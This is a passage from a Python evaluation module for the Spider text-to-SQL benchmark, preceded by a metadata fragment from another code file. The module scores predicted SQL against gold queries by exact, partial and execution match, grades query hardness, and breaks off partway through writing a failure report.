return new_var_num, new_non_neg_rest_num, new_non_pos_rest_num, new_eq_rest_num, new_positive_indexes, new_func_coefs, new_rest_coefs, new_rest_b
| Hembos/optimization-method | linear_programming/EnumerationSimplexMethod.py | EnumerationSimplexMethod.py | py | 10,391 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "copy.deepcopy",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.matrix",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.eye",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.vstack",
"line_number"... |
2265981494 | import os
import json
import sqlite3
import argparse
import logging
import pickle
from copy import deepcopy
import difflib
import traceback
from semparser.common import registry
from semparser.common.utils import print_dict
from semparser.modules.semantic_parser.preprocessor.process_spider_sql import get_sql, get_schema
from semparser.modules.semantic_parser.asdl.spider.spider_hypothesis import SpiderDecodeHypothesis
from semparser.modules.semantic_parser.inference.spider_ast import SpiderAST
# Flag to disable value evaluation
DISABLE_VALUE = True
# Flag to disable distinct in select evaluation
DISABLE_DISTINCT = True
CLAUSE_KEYWORDS = ('select', 'from', 'where', 'group', 'order',
'limit', 'intersect', 'union', 'except')
JOIN_KEYWORDS = ('join', 'on', 'as')
WHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')
UNIT_OPS = ('none', '-', '+', "*", '/')
AGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')
TABLE_TYPE = {
'sql': "sql",
'table_unit': "table_unit",
}
COND_OPS = ('and', 'or')
SQL_OPS = ('intersect', 'union', 'except')
ORDER_OPS = ('desc', 'asc')
HARDNESS = {
"component1": ('where', 'group', 'order', 'limit', 'join', 'or', 'like'),
"component2": ('except', 'union', 'intersect')
}
class Schema:
def __init__(self, schema):
self._schema = schema
self._idMap = self._map(self._schema)
@property
def schema(self):
return self._schema
@property
def idMap(self):
return self._idMap
def _map(self, schema):
idMap = {'*': "__all__"}
id = 1
for key, vals in schema.iteritems():
for val in vals:
idMap[key.lower() + "." + val.lower()] = "__" + \
key.lower() + "." + val.lower() + "__"
id += 1
for key in schema:
idMap[key.lower()] = "__" + key.lower() + "__"
return idMap
def condition_has_or(conds):
return 'or' in conds[1::2]
def condition_has_like(conds):
return WHERE_OPS.index('like') in [cond_unit[1] for cond_unit in conds[::2]]
def condition_has_sql(conds):
for cond_unit in conds[::2]:
val1, val2 = cond_unit[3], cond_unit[4]
if val1 is not None and type(val1) is dict:
return True
if val2 is not None and type(val2) is dict:
return True
return False
def val_has_op(val_unit):
return val_unit[0] != UNIT_OPS.index('none')
def has_agg(unit):
return unit[0] != AGG_OPS.index('none')
def accuracy(count, total):
if count == total:
return 1
return 0
def recall(count, total):
if count == total:
return 1
return 0
def F1(acc, rec):
if (acc + rec) == 0:
return 0
return (2. * acc * rec) / (acc + rec)
def get_scores(count, pred_total, label_total):
if pred_total != label_total:
return 0, 0, 0
elif count == pred_total:
return 1, 1, 1
return 0, 0, 0
def eval_sel(pred, label):
pred_sel = pred['select'][1]
label_sel = [x for x in label['select'][1]]
label_wo_agg = [unit[1] for unit in label_sel]
pred_total = len(pred_sel)
label_total = len(label_sel)
cnt = 0
cnt_wo_agg = 0
for unit in pred_sel:
if unit in label_sel:
cnt += 1
label_sel.remove(unit)
if unit[1] in label_wo_agg:
cnt_wo_agg += 1
label_wo_agg.remove(unit[1])
return label_total, pred_total, cnt, cnt_wo_agg
def eval_where(pred, label):
pred_conds = [unit for unit in pred['where'][::2]]
label_conds = [unit for unit in label['where'][::2]]
label_wo_agg = [unit[2] for unit in label_conds]
pred_total = len(pred_conds)
label_total = len(label_conds)
cnt = 0
cnt_wo_agg = 0
for unit in pred_conds:
if unit in label_conds:
cnt += 1
label_conds.remove(unit)
if unit[2] in label_wo_agg:
cnt_wo_agg += 1
label_wo_agg.remove(unit[2])
return label_total, pred_total, cnt, cnt_wo_agg
def eval_group(pred, label):
pred_cols = [unit[1] for unit in pred['groupBy']]
label_cols = [unit[1] for unit in label['groupBy']]
pred_total = len(pred_cols)
label_total = len(label_cols)
cnt = 0
pred_cols = [pred for pred in pred_cols]
label_cols = [label for label in label_cols]
for col in pred_cols:
if col in label_cols:
cnt += 1
label_cols.remove(col)
return label_total, pred_total, cnt
def eval_having(pred, label):
pred_total = label_total = cnt = 0
if len(pred['groupBy']) > 0:
pred_total = 1
if len(label['groupBy']) > 0:
label_total = 1
pred_cols = [unit[1] for unit in pred['groupBy']]
label_cols = [unit[1] for unit in label['groupBy']]
if pred_total == label_total == 1 \
and pred_cols == label_cols \
and pred['having'] == label['having']:
cnt = 1
return label_total, pred_total, cnt
def eval_order(pred, label):
pred_total = label_total = cnt = 0
if len(pred['orderBy']) > 0:
pred_total = 1
if len(label['orderBy']) > 0:
label_total = 1
if len(label['orderBy']) > 0 and pred['orderBy'] == label['orderBy'] and (
(pred['limit'] is None and label['limit'] is None) or (
pred['limit'] is not None and label['limit'] is not None)):
cnt = 1
return label_total, pred_total, cnt
def eval_and_or(pred, label):
pred_ao = pred['where'][1::2]
label_ao = label['where'][1::2]
pred_ao = set(pred_ao)
label_ao = set(label_ao)
if pred_ao == label_ao:
return 1, 1, 1
return len(pred_ao), len(label_ao), 0
def get_nestedSQL(sql):
nested = []
for cond_unit in sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]:
if type(cond_unit[3]) is dict:
nested.append(cond_unit[3])
if type(cond_unit[4]) is dict:
nested.append(cond_unit[4])
if sql['intersect'] is not None:
nested.append(sql['intersect'])
if sql['except'] is not None:
nested.append(sql['except'])
if sql['union'] is not None:
nested.append(sql['union'])
return nested
def eval_nested(pred, label):
label_total = 0
pred_total = 0
cnt = 0
if pred is not None:
pred_total += 1
if label is not None:
label_total += 1
if pred is not None and label is not None:
cnt += SpiderEvaluator().eval_exact_match(pred, label)
return label_total, pred_total, cnt
def eval_IUEN(pred, label):
lt1, pt1, cnt1 = eval_nested(pred['intersect'], label['intersect'])
lt2, pt2, cnt2 = eval_nested(pred['except'], label['except'])
lt3, pt3, cnt3 = eval_nested(pred['union'], label['union'])
label_total = lt1 + lt2 + lt3
pred_total = pt1 + pt2 + pt3
cnt = cnt1 + cnt2 + cnt3
return label_total, pred_total, cnt
def get_keywords(sql):
res = set()
if len(sql['where']) > 0:
res.add('where')
if len(sql['groupBy']) > 0:
res.add('group')
if len(sql['having']) > 0:
res.add('having')
if len(sql['orderBy']) > 0:
res.add(sql['orderBy'][0])
res.add('order')
if sql['limit'] is not None:
res.add('limit')
if sql['except'] is not None:
res.add('except')
if sql['union'] is not None:
res.add('union')
if sql['intersect'] is not None:
res.add('intersect')
# or keyword
ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]
if len([token for token in ao if token == 'or']) > 0:
res.add('or')
cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]
# not keyword
if len([cond_unit for cond_unit in cond_units if cond_unit[0]]) > 0:
res.add('not')
# in keyword
if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('in')]) > 0:
res.add('in')
# like keyword
if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')]) > 0:
res.add('like')
return res
def eval_keywords(pred, label):
pred_keywords = get_keywords(pred)
label_keywords = get_keywords(label)
pred_total = len(pred_keywords)
label_total = len(label_keywords)
cnt = 0
for k in pred_keywords:
if k in label_keywords:
cnt += 1
return label_total, pred_total, cnt
def count_agg(units):
return len([unit for unit in units if has_agg(unit)])
def count_component1(sql):
count = 0
if len(sql['where']) > 0:
count += 1
if len(sql['groupBy']) > 0:
count += 1
if len(sql['orderBy']) > 0:
count += 1
if sql['limit'] is not None:
count += 1
if len(sql['from']['table_units']) > 0: # JOIN
count += len(sql['from']['table_units']) - 1
ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]
count += len([token for token in ao if token == 'or'])
cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]
count += len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')])
return count
def count_component2(sql):
nested = get_nestedSQL(sql)
return len(nested)
def count_others(sql):
count = 0
# number of aggregation
agg_count = count_agg(sql['select'][1])
agg_count += count_agg(sql['where'][::2])
agg_count += count_agg(sql['groupBy'])
if len(sql['orderBy']) > 0:
agg_count += count_agg([unit[1] for unit in sql['orderBy'][1] if unit[1]] + [
unit[2] for unit in sql['orderBy'][1] if unit[2]])
agg_count += count_agg(sql['having'])
if agg_count > 1:
count += 1
# number of select columns
if len(sql['select'][1]) > 1:
count += 1
# number of where conditions
if len(sql['where']) > 1:
count += 1
# number of group by clauses
if len(sql['groupBy']) > 1:
count += 1
return count
class SpiderEvaluator:
"""A simple evaluator"""
def __init__(self):
self.partial_scores = None
def eval_hardness(self, sql):
count_comp1_ = count_component1(sql)
count_comp2_ = count_component2(sql)
count_others_ = count_others(sql)
if count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ == 0:
return "easy"
elif (count_others_ <= 2 and count_comp1_ <= 1 and count_comp2_ == 0) or \
(count_comp1_ <= 2 and count_others_ < 2 and count_comp2_ == 0):
return "medium"
elif (count_others_ > 2 and count_comp1_ <= 2 and count_comp2_ == 0) or \
(2 < count_comp1_ <= 3 and count_others_ <= 2 and count_comp2_ == 0) or \
(count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ <= 1):
return "hard"
else:
return "extra"
def eval_exact_match(self, pred, label):
partial_scores = self.eval_partial_match(pred, label)
self.partial_scores = partial_scores
for x, score in partial_scores.items():
if score['f1'] != 1:
return 0
if len(label['from']['table_units']) > 0:
label_tables = sorted(label['from']['table_units'])
pred_tables = sorted(pred['from']['table_units'])
return label_tables == pred_tables
return 1
def eval_partial_match(self, pred, label):
res = {}
label_total, pred_total, cnt, cnt_wo_agg = eval_sel(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['select'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)
res['select(no AGG)'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
label_total, pred_total, cnt, cnt_wo_agg = eval_where(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['where'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)
res['where(no OP)'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
label_total, pred_total, cnt = eval_group(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['group(no Having)'] = {'acc': acc, 'rec': rec, 'f1': f1, 'label_total': label_total,
'pred_total': pred_total}
label_total, pred_total, cnt = eval_having(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['group'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
label_total, pred_total, cnt = eval_order(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['order'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
label_total, pred_total, cnt = eval_and_or(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['and/or'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
label_total, pred_total, cnt = eval_IUEN(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['IUEN'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
label_total, pred_total, cnt = eval_keywords(pred, label)
acc, rec, f1 = get_scores(cnt, pred_total, label_total)
res['keywords'] = {'acc': acc, 'rec': rec, 'f1': f1,
'label_total': label_total, 'pred_total': pred_total}
return res
def isValidSQL(sql, db):
conn = sqlite3.connect(db)
cursor = conn.cursor()
try:
cursor.execute(sql)
except Exception:
return False
return True
def print_scores(scores, etype, p_func=print):
levels = ['easy', 'medium', 'hard', 'extra', 'all']
partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',
'group', 'order', 'and/or', 'IUEN', 'keywords']
p_func("{:20} {:20} {:20} {:20} {:20} {:20}".format("", *levels))
counts = [scores[level]['count'] for level in levels]
p_func("{:20} {:<20d} {:<20d} {:<20d} {:<20d} {:<20d}".format("count", *counts))
if etype in ["all", "exec"]:
p_func('===================== EXECUTION ACCURACY =====================')
this_scores = [scores[level]['exec'] for level in levels]
p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(
"execution", *this_scores))
if etype in ["all", "match"]:
p_func('\n====================== EXACT MATCHING ACCURACY =====================')
exact_scores = [scores[level]['exact'] for level in levels]
p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(
"exact match", *exact_scores))
if 'exact_alan' in scores['all']:
exact_scores_alan = [scores[level]['exact_alan'] for level in levels]
p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(
"Alan exact match", *exact_scores_alan))
p_func('\n---------------------PARTIAL MATCHING ACCURACY----------------------')
for type_ in partial_types:
this_scores = [scores[level]['partial'][type_]['acc'] for level in levels]
p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(type_, *this_scores))
p_func('---------------------- PARTIAL MATCHING RECALL ----------------------')
for type_ in partial_types:
this_scores = [scores[level]['partial'][type_]['rec'] for level in levels]
p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(type_, *this_scores))
p_func('---------------------- PARTIAL MATCHING F1 --------------------------')
for type_ in partial_types:
this_scores = [scores[level]['partial'][type_]['f1'] for level in levels]
p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(type_, *this_scores))
def evaluate(gold, predict, db_dir, etype, kmaps):
with open(gold) as f:
glist = [l.strip().split('\t') for l in f.readlines() if len(l.strip()) > 0]
with open(predict) as f:
plist = [l.strip().split('\t') for l in f.readlines() if len(l.strip()) > 0]
evaluator = SpiderEvaluator()
levels = ['easy', 'medium', 'hard', 'extra', 'all']
partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',
'group', 'order', 'and/or', 'IUEN', 'keywords']
entries = []
scores = {}
for level in levels:
scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}
scores[level]['exec'] = 0
for type_ in partial_types:
scores[level]['partial'][type_] = {'acc': 0.,
'rec': 0., 'f1': 0., 'acc_count': 0, 'rec_count': 0}
eval_err_num = 0
for p, g in zip(plist, glist):
p_str = p[0]
g_str, db = g
db_name = db
db = os.path.join(db_dir, db, db + ".sqlite")
schema = Schema(get_schema(db))
g_sql = get_sql(schema, g_str)
hardness = evaluator.eval_hardness(g_sql)
scores[hardness]['count'] += 1
scores['all']['count'] += 1
try:
p_sql = get_sql(schema, p_str)
except Exception:
# If p_sql is not valid, then we will use an empty sql to evaluate with the correct sql
p_sql = {
"except": None,
"from": {
"conds": [],
"table_units": []
},
"groupBy": [],
"having": [],
"intersect": None,
"limit": None,
"orderBy": [],
"select": [
False,
[]
],
"union": None,
"where": []
}
eval_err_num += 1
print("eval_err_num:{}".format(eval_err_num))
# rebuild sql for value evaluation
kmap = kmaps[db_name]
g_valid_col_units = build_valid_col_units(g_sql['from']['table_units'], schema)
g_sql = rebuild_sql_val(g_sql)
g_sql = rebuild_sql_col(g_valid_col_units, g_sql, kmap)
p_valid_col_units = build_valid_col_units(p_sql['from']['table_units'], schema)
p_sql = rebuild_sql_val(p_sql)
p_sql = rebuild_sql_col(p_valid_col_units, p_sql, kmap)
if etype in ["all", "exec"]:
exec_score = eval_exec_match(db, p_str, g_str, p_sql, g_sql)
if exec_score:
scores[hardness]['exec'] += 1
if etype in ["all", "match"]:
exact_score = evaluator.eval_exact_match(p_sql, g_sql)
partial_scores = evaluator.partial_scores
if exact_score == 0:
print("{} pred: {}".format(hardness, p_str))
print("{} gold: {}".format(hardness, g_str))
print("")
scores[hardness]['exact'] += exact_score
scores['all']['exact'] += exact_score
for type_ in partial_types:
if partial_scores[type_]['pred_total'] > 0:
scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']
scores[hardness]['partial'][type_]['acc_count'] += 1
if partial_scores[type_]['label_total'] > 0:
scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']
scores[hardness]['partial'][type_]['rec_count'] += 1
scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']
if partial_scores[type_]['pred_total'] > 0:
scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']
scores['all']['partial'][type_]['acc_count'] += 1
if partial_scores[type_]['label_total'] > 0:
scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']
scores['all']['partial'][type_]['rec_count'] += 1
scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']
entries.append({
'predictSQL': p_str,
'goldSQL': g_str,
'hardness': hardness,
'exact': exact_score,
'partial': partial_scores
})
for level in levels:
if scores[level]['count'] == 0:
continue
if etype in ["all", "exec"]:
scores[level]['exec'] /= scores[level]['count']
if etype in ["all", "match"]:
scores[level]['exact'] /= scores[level]['count']
for type_ in partial_types:
if scores[level]['partial'][type_]['acc_count'] == 0:
scores[level]['partial'][type_]['acc'] = 0
else:
scores[level]['partial'][type_]['acc'] = scores[level]['partial'][type_]['acc'] / \
scores[level]['partial'][type_]['acc_count'] * 1.0
if scores[level]['partial'][type_]['rec_count'] == 0:
scores[level]['partial'][type_]['rec'] = 0
else:
scores[level]['partial'][type_]['rec'] = scores[level]['partial'][type_]['rec'] / \
scores[level]['partial'][type_]['rec_count'] * 1.0
if scores[level]['partial'][type_]['acc'] == 0 and scores[level]['partial'][type_]['rec'] == 0:
scores[level]['partial'][type_]['f1'] = 1
else:
scores[level]['partial'][type_]['f1'] = \
2.0 * scores[level]['partial'][type_]['acc'] * scores[level]['partial'][type_]['rec'] / (
scores[level]['partial'][type_]['rec'] + scores[level]['partial'][type_]['acc'])
print_scores(scores, etype)
def eval_exec_match(db, p_str, g_str, pred, gold):
"""
return 1 if the values between prediction and gold are matching
in the corresponding index. Currently not support multiple col_unit(pairs).
"""
conn = sqlite3.connect(db)
cursor = conn.cursor()
try:
cursor.execute(p_str)
p_res = cursor.fetchall()
except Exception:
return False
cursor.execute(g_str)
q_res = cursor.fetchall()
def res_map(res, val_units):
rmap = {}
for idx, val_unit in enumerate(val_units):
key = tuple(val_unit[1]) if not val_unit[2] else (
val_unit[0], tuple(val_unit[1]), tuple(val_unit[2]))
rmap[key] = [r[idx] for r in res]
return rmap
p_val_units = [unit[1] for unit in pred['select'][1]]
q_val_units = [unit[1] for unit in gold['select'][1]]
return res_map(p_res, p_val_units) == res_map(q_res, q_val_units)
# Rebuild SQL functions for value evaluation
def rebuild_cond_unit_val(cond_unit):
if cond_unit is None or not DISABLE_VALUE:
return cond_unit
not_op, op_id, val_unit, val1, val2 = cond_unit
if type(val1) is not dict:
val1 = None
else:
val1 = rebuild_sql_val(val1)
if type(val2) is not dict:
val2 = None
else:
val2 = rebuild_sql_val(val2)
return not_op, op_id, val_unit, val1, val2
def rebuild_condition_val(condition):
if condition is None or not DISABLE_VALUE:
return condition
res = []
for idx, it in enumerate(condition):
if idx % 2 == 0:
res.append(rebuild_cond_unit_val(it))
else:
res.append(it)
return res
def rebuild_sql_val(sql):
if sql is None or not DISABLE_VALUE:
return sql
sql['from']['conds'] = rebuild_condition_val(sql['from']['conds'])
sql['having'] = rebuild_condition_val(sql['having'])
sql['where'] = rebuild_condition_val(sql['where'])
for tab_unit in sql['from']['table_units']:
if tab_unit[0] == 'sql':
tab_unit = ('sql', rebuild_sql_val(tab_unit[1]))
sql['intersect'] = rebuild_sql_val(sql['intersect'])
sql['except'] = rebuild_sql_val(sql['except'])
sql['union'] = rebuild_sql_val(sql['union'])
return sql
# Rebuild SQL functions for foreign key evaluation
def build_valid_col_units(table_units, schema):
col_names = schema._table['column_names_original']
tab_ids = [table_unit[1]
for table_unit in table_units if table_unit[0] == TABLE_TYPE['table_unit']]
valid_col_units = []
for value in schema.idMap.values():
if col_names[value][0] in tab_ids:
valid_col_units.append(value)
return valid_col_units
def rebuild_col_unit_col(valid_col_units, col_unit, kmap):
if col_unit is None:
return col_unit
agg_id, col_id, distinct = col_unit
if col_id in kmap and col_id in valid_col_units:
col_id = kmap[col_id]
if DISABLE_DISTINCT:
distinct = None
return agg_id, col_id, distinct
def rebuild_val_unit_col(valid_col_units, val_unit, kmap):
if val_unit is None:
return val_unit
unit_op, col_unit1, col_unit2 = val_unit
col_unit1 = rebuild_col_unit_col(valid_col_units, col_unit1, kmap)
col_unit2 = rebuild_col_unit_col(valid_col_units, col_unit2, kmap)
return unit_op, col_unit1, col_unit2
def rebuild_table_unit_col(valid_col_units, table_unit, kmap):
if table_unit is None:
return table_unit
table_type, col_unit_or_sql = table_unit
if isinstance(col_unit_or_sql, tuple):
col_unit_or_sql = rebuild_col_unit_col(valid_col_units, col_unit_or_sql, kmap)
return table_type, col_unit_or_sql
def rebuild_cond_unit_col(valid_col_units, cond_unit, kmap):
if cond_unit is None:
return cond_unit
not_op, op_id, val_unit, val1, val2 = cond_unit
val_unit = rebuild_val_unit_col(valid_col_units, val_unit, kmap)
if isinstance(val1, dict):
val1 = rebuild_sql_col(valid_col_units, val1, kmap)
if isinstance(val2, dict):
val2 = rebuild_sql_col(valid_col_units, val2, kmap)
return not_op, op_id, val_unit, val1, val2
def rebuild_condition_col(valid_col_units, condition, kmap):
for idx in range(len(condition)):
if idx % 2 == 0:
condition[idx] = rebuild_cond_unit_col(valid_col_units, condition[idx], kmap)
return condition
def rebuild_select_col(valid_col_units, sel, kmap):
if sel is None:
return sel
distinct, _list = sel
new_list = []
for it in _list:
agg_id, val_unit = it
new_list.append((agg_id, rebuild_val_unit_col(valid_col_units, val_unit, kmap)))
if DISABLE_DISTINCT:
distinct = None
return distinct, new_list
def rebuild_from_col(valid_col_units, from_, kmap):
if from_ is None:
return from_
from_['table_units'] = [rebuild_table_unit_col(valid_col_units, table_unit, kmap) for table_unit in
from_['table_units']]
from_['conds'] = rebuild_condition_col(valid_col_units, from_['conds'], kmap)
return from_
def rebuild_group_by_col(valid_col_units, group_by, kmap):
if group_by is None:
return group_by
return [rebuild_col_unit_col(valid_col_units, col_unit, kmap) for col_unit in group_by]
def rebuild_order_by_col(valid_col_units, order_by, kmap):
if order_by is None or len(order_by) == 0:
return order_by
direction, val_units = order_by
new_val_units = [rebuild_val_unit_col(valid_col_units, val_unit, kmap)
for val_unit in val_units]
return direction, new_val_units
def rebuild_sql_col(valid_col_units, sql, kmap):
if sql is None:
return sql
sql['select'] = rebuild_select_col(valid_col_units, sql['select'], kmap)
sql['from'] = rebuild_from_col(valid_col_units, sql['from'], kmap)
sql['where'] = rebuild_condition_col(valid_col_units, sql['where'], kmap)
sql['groupBy'] = rebuild_group_by_col(valid_col_units, sql['groupBy'], kmap)
sql['orderBy'] = rebuild_order_by_col(valid_col_units, sql['orderBy'], kmap)
sql['having'] = rebuild_condition_col(valid_col_units, sql['having'], kmap)
sql['intersect'] = rebuild_sql_col(valid_col_units, sql['intersect'], kmap)
sql['except'] = rebuild_sql_col(valid_col_units, sql['except'], kmap)
sql['union'] = rebuild_sql_col(valid_col_units, sql['union'], kmap)
return sql
def build_foreign_key_map(entry):
cols_orig = entry["column_names_original"]
# rebuild cols corresponding to idmap in Schema
cols = [i for i in range(len(cols_orig))]
def keyset_in_list(k1, k2, k_list):
for k_set in k_list:
if k1 in k_set or k2 in k_set:
return k_set
new_k_set = set()
k_list.append(new_k_set)
return new_k_set
foreign_key_list = []
foreign_keys = entry["foreign_keys"]
for fkey in foreign_keys:
key1, key2 = fkey
key_set = keyset_in_list(key1, key2, foreign_key_list)
key_set.add(key1)
key_set.add(key2)
foreign_key_map = {}
for key_set in foreign_key_list:
sorted_list = sorted(list(key_set))
midx = sorted_list[0]
for idx in sorted_list:
foreign_key_map[cols[idx]] = cols[midx]
return foreign_key_map
def build_foreign_key_map_from_json(table):
with open(table) as f:
data = json.load(f)
tables = {}
for entry in data:
tables[entry['db_id']] = build_foreign_key_map(entry)
return tables
def is_col_valid(col_unit, in_where=False):
if col_unit is None:
return True
if col_unit[0] == 0 and col_unit[1] == 0:
return False
if in_where and col_unit[0] != 0:
return False
return True
def is_query_valid(_sql, schema):
select_body = _sql['select'][1]
if len(select_body) != len(set(select_body)):
return False
conds = _sql['from']['conds'][::2]
tab_in_conds = set()
for cond in conds:
tab1 = schema._table['column_names_original'][cond[2][1][1]][0]
tab2 = schema._table['column_names_original'][cond[3][1]][0]
if tab1 == -1 or tab2 == -1:
return False
tab_in_conds.add(tab1)
tab_in_conds.add(tab2)
table_units = _sql['from']['table_units']
tab_in_from = set()
for tab in table_units:
if isinstance(tab[1], int):
tab_in_from.add(tab[1])
if len(tab_in_from) > 1 and tab_in_conds != tab_in_from:
return False
if len(table_units) == 1 and len(conds) > 0:
return False
where_conds = _sql['where'][::2]
having_conds = _sql['having'][::2]
for cond in where_conds:
if isinstance(cond[3], dict) and not is_sql_valid(cond[3], schema):
return False
if not is_col_valid(cond[2][1], True):
return False
if not is_col_valid(cond[2][2], True):
return False
for cond in having_conds:
if isinstance(cond[3], dict) and not is_sql_valid(cond[3], schema):
return False
if not is_col_valid(cond[2][1]):
return False
if not is_col_valid(cond[2][2]):
return False
groupBy = _sql['groupBy']
for col_unit in groupBy:
if not is_col_valid(col_unit):
return False
if len(_sql['orderBy']) > 0:
orderBy = _sql['orderBy'][1]
for val_unit in orderBy:
if not is_col_valid(val_unit[1]):
return False
if not is_col_valid(val_unit[2]):
return False
return True
def is_sql_valid(_sql, schema):
if _sql['except']:
if not is_query_valid(_sql['except'], schema):
return False
elif _sql['union']:
if not is_query_valid(_sql['union'], schema):
return False
elif _sql['intersect']:
if not is_query_valid(_sql['intersect'], schema):
return False
return is_query_valid(_sql, schema)
# Define new evaluator
@registry.register('evaluator', 'spider')
class SpiderSqlEvaluator:
def __init__(self, transition_system, args):
pass
@staticmethod
def print_results(results, p_func=print):
print_scores(results, 'match', p_func=p_func)
@staticmethod
def evaluate_dataset(examples, decode_results, out_path, fast_mode=True,
test_mode='dev', save_failed_samples=False):
evaluator = SpiderEvaluator()
if fast_mode:
levels = ['easy', 'medium', 'hard', 'extra', 'all']
partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',
'group', 'order', 'and/or', 'IUEN', 'keywords']
etype = 'match'
scores = {}
# Init scores
for level in levels:
scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}
for type_ in partial_types:
scores[level]['partial'][type_] = {
'acc': 0., 'rec': 0., 'f1': 0., 'acc_count': 0, 'rec_count': 0}
pred_sql = []
gold_sql = []
pred_actions = []
gold_actions = []
questions = []
eval_err_num = 0
idx = 0
for example, spider_sql in zip(examples, decode_results):
pruned_hyps = []
for hyp in spider_sql:
if is_sql_valid(hyp.code, example.schema):
pruned_hyps.append(hyp)
gold_spider_sql = example.sql
_gold_spider_sql = deepcopy(gold_spider_sql)
pred_spider_sql = pruned_hyps[:1]
if not pred_spider_sql:
# dummy sql
surface_sql = 'SELECT *'
else:
surface_sql = SpiderAST(pred_spider_sql[0].code, example.schema._table).get_sql()
if not pred_spider_sql:
p_sql = {
"except": None,
"from": {
"conds": [],
"table_units": []
},
"groupBy": [],
"having": [],
"intersect": None,
"limit": None,
"orderBy": [],
"select": [
False,
[]
],
"union": None,
"where": []
}
pred_spider_sql = SpiderDecodeHypothesis(example.schema)
pred_spider_sql.code = p_sql
eval_err_num += 1
else:
pred_spider_sql = pred_spider_sql[0]
_pred_spider_sql = deepcopy(pred_spider_sql.code)
schema = example.schema
kmap = build_foreign_key_map(example.schema._table)
g_valid_col_units = build_valid_col_units(
gold_spider_sql['from']['table_units'], schema)
gold_spider_sql = rebuild_sql_val(gold_spider_sql)
gold_spider_sql = rebuild_sql_col(g_valid_col_units, gold_spider_sql, kmap)
p_valid_col_units = build_valid_col_units(
pred_spider_sql.code['from']['table_units'], schema)
pred_spider_sql.code = rebuild_sql_val(pred_spider_sql.code)
pred_spider_sql.code = rebuild_sql_col(
p_valid_col_units, pred_spider_sql.code, kmap)
hardness = evaluator.eval_hardness(gold_spider_sql)
scores[hardness]['count'] += 1
scores['all']['count'] += 1
exact_score = evaluator.eval_exact_match(pred_spider_sql.code, gold_spider_sql)
if exact_score == 0 and save_failed_samples:
f_out = open(os.path.join(out_path, "%d-%s.md" % (idx, hardness)), "w")
f_out.write('### Question\n%s\n' % example.original)
f_out.write('\n### Spider SQL\n')
f_out.write('- ***pred***: ')
f_out.write('%s\n' % surface_sql)
f_out.write('- ***gold***: ')
f_out.write('%s\n' % example.tgt_code)
f_out.write('\n### Action Sequences Diff\n')
pred_actions = []
for a in pred_spider_sql.actions:
pred_actions.append(str(a).replace('*', '\*'))
gold_actions = []
for a in example.tgt_actions:
gold_actions.append(str(a.action).replace('*', '\*'))
for line in difflib.unified_diff(pred_actions, gold_actions, fromfile='pred', tofile='gold'):
f_out.write('\t%s\n' % line)
f_out.write('\n### Schema\n')
f_out.write('\tcol_id,\ttab_name,\tcol_name\n')
for _id, (tab_id, col_name) in enumerate(example.schema._table['exp_column_names_original']):
f_out.write('\t%d,\t%s,\t%s\n' % (
_id, example.schema._table['exp_table_names_original'][tab_id], col_name))
f_out.write('\n### Primary Keys\n%s\n' %
